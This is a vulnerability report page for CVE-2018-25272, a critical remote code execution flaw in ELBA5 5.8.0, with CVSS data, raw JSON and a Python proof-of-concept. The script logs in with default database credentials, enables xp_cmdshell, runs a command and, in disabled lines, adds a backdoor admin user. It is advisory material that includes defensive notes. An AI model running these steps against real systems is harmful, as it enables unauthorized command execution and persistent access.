Security Vulnerability Report
CVE-2018-25272 CVSS 9.8 CRITICAL

CVE-2018-25272

Published: 2026-04-22 16:16:48
Last Modified: 2026-04-29 20:46:34

Description

ELBA5 5.8.0 contains a remote code execution vulnerability that allows attackers to obtain database credentials and execute arbitrary commands with SYSTEM level permissions. Attackers can connect to the database using default connector credentials, decrypt the DBA password, and execute commands via the xp_cmdshell stored procedure or add backdoor users to the BEDIENER table.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ELBA5 5.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pymssql

# Proof-of-concept outline for CVE-2018-25272 (ELBA5 5.8.0), following the
# chain in the advisory text: default connector credentials -> DBA password
# -> command execution through xp_cmdshell.
#
# This listing is a skeleton, not a working reproduction: every value below
# is a placeholder and the DBA-password decryption step is not implemented.
#
# NOTE(review): the code assumes a Microsoft SQL Server backend (pymssql,
# sp_configure, master..xp_cmdshell). The advisory text does not name the
# database engine -- confirm against the referenced advisories before
# building detection content from these statements.
#
# Defensive reading of the chain:
#   * It starts with a network login using credentials that ship as
#     defaults, so restricting which hosts can reach the database listener
#     and alerting on connector-account logins from unexpected hosts cover
#     the first step.
#   * The advisory states that commands run with SYSTEM level permissions,
#     so the impact follows from the account the database service runs as.
#   * xp_cmdshell use and new rows in the BEDIENER table are the two
#     outcomes the advisory names; both are worth auditing.

# Configuration (placeholders; must be replaced for an authorized test)
host = 'TARGET_IP'
user = 'DEFAULT_CONNECTOR_USER'  # e.g. 'elba_user'
password = 'DEFAULT_CONNECTOR_PASS'
db_name = 'ELBA_DB'


def exploit():
    """Walk through the advisory's steps against the configured host.

    Connects with the connector credentials, enables xp_cmdshell, runs one
    fixed command and prints its output. Any exception is caught and
    printed; nothing is returned.
    """
    try:
        # Step 1: log in with the default connector credentials.
        print(f"[*] Connecting to {host}...")
        db_conn = pymssql.connect(host, user, password, db_name)
        cur = db_conn.cursor()
        print("[+] Connection established!")

        # Step 2: placeholder only. The value is a literal string and is
        # never used afterwards, so the success message below does not
        # reflect any real decryption.
        dba_password = "decrypted_dba_password"
        print("[+] DBA password decrypted/obtained.")

        # Step 3: turn on xp_cmdshell over the *same* connector session.
        # This only succeeds if that account may change server options.
        # On SQL Server, option changes made through sp_configure are
        # recorded in the server error log, which gives defenders a
        # signal to alert on.
        enable_sql = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
        cur.execute(enable_sql)
        db_conn.commit()
        print("[+] xp_cmdshell enabled.")

        # Step 4: run a fixed, harmless identity check and print each
        # returned row's first column.
        cmd_to_exec = 'whoami'
        print(f"[*] Executing command: {cmd_to_exec}")
        shell_sql = f"EXEC master..xp_cmdshell '{cmd_to_exec}'"
        cur.execute(shell_sql)
        for row in cur.fetchall():
            print(row[0])

        # Step 5 (disabled in the original): the advisory mentions rows
        # being added to the BEDIENER table. The column names below come
        # from this listing, not from the advisory.
        # add_user_sql = "INSERT INTO BEDIENER (username, password, is_admin) VALUES ('hacker', 'password', 1)"
        # cur.execute(add_user_sql)
        # db_conn.commit()
        # print("[+] Backdoor user added.")

        # Reached only on the success path; an earlier exception skips it.
        db_conn.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25272", "sourceIdentifier": "[email protected]", "published": "2026-04-22T16:16:48.143", "lastModified": "2026-04-29T20:46:33.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ELBA5 5.8.0 contains a remote code execution vulnerability that allows attackers to obtain database credentials and execute arbitrary commands with SYSTEM level permissions. Attackers can connect to the database using default connector credentials, decrypt the DBA password, and execute commands via the xp_cmdshell stored procedure or add backdoor users to the BEDIENER table."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-326"}]}], "references": [{"url": "https://www.elba.at", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45905", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/elba5-remote-code-execution-via-database-access", "source": "[email protected]"}]}}